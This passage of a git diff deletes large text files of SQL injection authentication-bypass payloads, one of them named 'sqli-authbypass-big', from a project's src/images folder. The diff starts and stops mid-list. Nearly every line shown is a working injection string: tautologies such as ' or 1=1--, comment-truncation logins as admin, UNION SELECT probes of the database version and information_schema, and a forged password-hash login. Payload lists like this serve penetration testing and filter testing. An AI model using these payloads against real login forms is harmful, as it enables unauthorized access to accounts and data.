-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
